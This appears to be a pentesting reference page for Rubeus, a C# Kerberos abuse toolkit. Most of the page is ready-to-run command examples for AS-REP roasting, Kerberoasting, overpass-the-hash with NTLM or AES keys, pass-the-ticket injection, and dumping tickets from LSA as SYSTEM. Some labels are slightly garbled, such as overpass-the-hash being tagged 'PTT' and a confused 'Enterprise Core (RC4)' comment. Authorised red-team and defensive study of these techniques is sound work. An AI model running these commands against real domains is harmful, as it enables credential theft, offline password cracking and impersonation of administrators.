Skip to content

Rubeus

Kerberos interaction and abuse toolkit

C#GitHub

Overview

Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project and the broader Kerberos research community. Rubeus acts as a Swiss Army knife for dealing with Kerberos tickets (TGTs and TGSs), allowing red teamers and penetration testers to request, extract, forge, and pass Kerberos tickets without directly invoking mimikatz.

Key Features

  • Overpass-the-Hash (PTT) capabilities.
  • AS-REP Roasting and Kerberoasting.
  • Ticket extraction from LSASS (without requiring complete mimikatz).
  • Ticket renewal and harvesting (Ticket monitoring).
  • Forced delegation abuses (S4U2Self / S4U2Proxy).

Usage Examples

AS-REP Roasting

Fetch AS-REP hashes for accounts without DONT_REQ_PREAUTH set.

BASH 
# Automatically discover and roast vulnerable accounts in the domain
Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt

# Target a specific user
Rubeus.exe asreproast /user:victim_user /domain:target.local /format:hashcat

Kerberoasting

Extract service tickets to be cracked offline for accounts configured with SPNs.

BASH 
# Identify and request tickets for all vulnerable SPNs
Rubeus.exe kerberoast /outfile:kerb_hashes.txt

# Target a specific SPN and use Enterprise Core (RC4) format
Rubeus.exe kerberoast /spn:cifs/srv-fs01.target.local /rc4opsec /outfile:kerb_hashes.txt

Overpass-the-Hash

Request a Kerberos Ticket Granting Ticket (TGT) using an NTLM hash or AES key, rather than a plaintext password.

BASH 
# Request TGT using an RC4/NTLM hash and inject it into the current session
Rubeus.exe asktgt /user:Administrator /rc4:NTLM_HASH_HERE /ptt

# Request TGT using an AES256 key
Rubeus.exe asktgt /user:Administrator /aes256:AES256_KEY_HERE /ptt

Pass-the-Ticket (PTT)

Pass an existing .kirbi or Base64-encoded ticket into the current logon session.

BASH 
# Pass a base64 encoded ticket
Rubeus.exe ptt /ticket:BASE64_BLOB

# Pass a ticket from a .kirbi file
Rubeus.exe ptt /ticket:C:\Windows\Temp\ticket.kirbi

Ticket Extraction

Extract present tickets from LSA. Note: this requires high integrity (Administrator/SYSTEM).

BASH 
# Dump all tickets in base64 format for easy copying out of a terminal
Rubeus.exe dump /luid:0x3e7 /nowrap
Back to Network Pentesting